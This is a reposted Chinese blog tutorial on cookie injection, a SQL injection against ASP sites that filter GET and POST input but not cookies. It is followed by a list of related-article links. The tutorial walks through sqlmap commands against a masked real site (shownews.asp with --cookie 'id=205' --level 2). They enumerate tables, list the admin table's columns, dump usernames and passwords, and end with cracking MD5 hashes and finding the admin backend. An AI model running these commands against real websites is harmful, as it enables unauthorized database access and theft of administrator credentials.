cookie注入

简介:

我先说一下什么是cookies注入,如果你学过ASP,你应该知道Request.QueryString(get)或Requset.FORM)(POST)

这就是我们读取用户发给WEB服务器的指定键的值!
有时我们为了简化代码,会写成

ID=Request("ID")

这样写法是简单,但是问题就来了

cookie注入利用的环境

我们知道WEB服务是怎样读取数据的,他是先GET中的数据,没有再取POST中的数据,还回去取cookies中的数据

我们再看看房主入系统,她会检测GET和POST中的数据。如果有特殊字符(‘   and   order by)禁止数据的提交,比如下图所示:

wKiom1j8Dp7BYl0LAAB_eL9iHzU476.png-wh_50

但是它并没有检测cookies中的数据,所以我们就可以对这个网站发动攻击。

wKioL1j8D4TgytPXAAFX8uOj3m8697.png-wh_50

可以看到ID=205,所以我们可以用sqlmap对这个网站发动攻击.

1:首先打开sqlmap,需要声明一点,在sqlmap中使用cookie注入,level >=2才行

输入命令:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2
检测到此url含有注入点,再来!


2:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2  --tables   获取数据库中的所有表

wKioL1j8ENLhXflyAABD6qcJo-o228.png-wh_50



3:接下来对这个admin进行检测sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin --column

wKiom1j8FLehy1e4AABVW55FsB4770.png-wh_50

4:然后对这个username和password进行爆破

sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin -C username,password --dump

wKiom1j8FfvwALEhAAA4Z4h75w8133.png-wh_50

5:爆出来后密码是用md5形式加密的,所以拿到相应的网站解密就可以了。然后就是找后台就可以了;


结束!


本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918560


相关文章
|
7月前
|
安全 关系型数据库 MySQL
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
376 1
|
7月前
|
安全 数据库
17、cookie注入
17、cookie注入
58 0
|
7月前
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
59 0
|
7月前
|
安全 数据库
小课堂 -- cookie注入
小课堂 -- cookie注入
26 0
|
7月前
|
数据安全/隐私保护
小课堂 -- cookie注入(base64加密)
小课堂 -- cookie注入(base64加密)
55 0
|
Web App开发 安全 关系型数据库
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
196 0
Sqlmap2021 -- Cookie注入
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
154 0
18、cookie注入(base64加密)
|
安全 数据库
17、cookie注入
17、cookie注入
71 0
17、cookie注入